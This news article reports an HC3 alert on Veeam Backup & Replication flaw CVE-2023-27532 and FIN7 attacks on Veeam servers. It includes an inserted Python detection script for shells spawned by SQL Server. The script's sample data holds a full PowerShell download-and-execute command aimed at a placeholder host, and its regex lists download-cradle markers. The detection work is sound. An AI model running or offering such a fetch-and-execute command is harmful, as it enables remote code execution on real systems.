According to the vendor, an unauthenticated user operating within the backup infrastructure network perimeter can obtain encrypted credentials stored in the Veeam configuration database.
Why it matters
Following a growing number of cyber attacks exploiting the Veeam Backup & Replication software vulnerability, tracked as CVE-2023-27532, the Health Sector Cybersecurity Coordination Center (HC3) recommends that all healthcare organizations keep user systems up to date and fix weaknesses.
“What makes this threat significant is that in addition to backing up and recovering VMs, it can be used to store personal files and applications for environments such as Microsoft Exchange and SharePoint used in the HPH area. This is done for protection and restoration,” the agency said in an analysis note dated 10 May.
The software also has the ability to provide transaction-level restore of Oracle and Microsoft SQL databases.
Veeam issued an alert to its customers on March 7, noting the vulnerable process Veeam.Backup.Service.exe – TCP 9401 by default – and advised them to update their software.
WithSecure Labs identified a financially motivated cybercrime group, FIN7, in recent attacks on Veeam servers.
“On March 28, 2023, initial activity was observed across Internet-facing servers running Veeam Backup and Replication software,” according to its website.
“A SQL Server process ‘sqlservr.exe’ executed a shell command belonging to the Veeam Backup instance, which performed an in-memory download and execution of a PowerShell script.”
WithSecure Labs reported that the threat actor tested lateral movement with exfiltrated credentials.
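One way to hunt for the process behaviour described above, added here as an example and not code from WithSecure, Veeam or HC3: it flags process-creation events where sqlservr.exe starts a shell, and raises the severity when the command line carries download-and-execute markers. Field names follow Sysmon Event ID 1; the hosts, paths, command lines and the marker list are constructed assumptions.

```python
import ntpath
import re

# Shells a database engine has little reason to start.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Markers of download-and-run-in-memory PowerShell usage (assumed list).
CRADLE = re.compile(
    r"downloadstring|net\.webclient|invoke-expression|\biex\b|frombase64string",
    re.IGNORECASE,
)

def base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()

def flag_sql_shell_spawn(events):
    """Return (severity, host) for each shell started by sqlservr.exe."""
    findings = []
    for ev in events:
        if base(ev.get("ParentImage")) != "sqlservr.exe":
            continue
        if base(ev.get("Image")) not in SHELLS:
            continue
        cradle = CRADLE.search(ev.get("CommandLine") or "")
        findings.append(("high" if cradle else "medium", ev.get("Host")))
    return findings

SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; field names follow Sysmon Event ID 1 (process creation).
SAMPLE = [
    {"Host": "bkp01", "ParentImage": SQL.upper(), "Image": CMD,
     "CommandLine": "cmd /c powershell -nop -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"Host": "bkp02", "ParentImage": SQL, "Image": CMD,
     "CommandLine": "cmd /c dir D:\\Backups"},
    {"Host": "bkp03", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": SQL, "CommandLine": "sqlservr.exe -sBACKUPDB"},
    {"Host": "ws17", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -c \"iex $profile\""},
]

if __name__ == "__main__":
    for severity, host in flag_sql_shell_spawn(SAMPLE):
        print(f"{severity:6} {host}: sqlservr.exe spawned a shell")
```

The "medium" case still deserves review on a backup server, since a shell started by the database engine is unusual even without a download marker.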
Big trend
Whether it’s with phishing scams, exploiting vulnerabilities to steal credentials, or taking advantage of insider threat schemes, hospitals, health plans, and other healthcare organizations are prime targets for bad actors who are always looking for an easy way into a network.
“Organizations should review their identity and access management implementations to force the use of multifactor authentication,” John Hendley, head of strategy at IBM Security X-Force, advised in the 2022 Data Breach Costs report.
“Just this one step goes a long way in curbing the ability of cybercriminals to use stolen credentials, one of their preferred methods of initial compromise.”
On the record
“HC3 recommends that all HPH field entities be vigilant and aware of suspicious activity, keep systems updated and fix any vulnerable systems immediately,” the agency said in the alert note.
“In addition, organizations are encouraged to take a proactive approach by using CISA’s free cyber security services and tools to strengthen their cyber posture.”
Andrea Fox is a senior editor for Healthcare IT News.
Email: afox@himss.org
Healthcare IT News is a HIMSS Media publication.










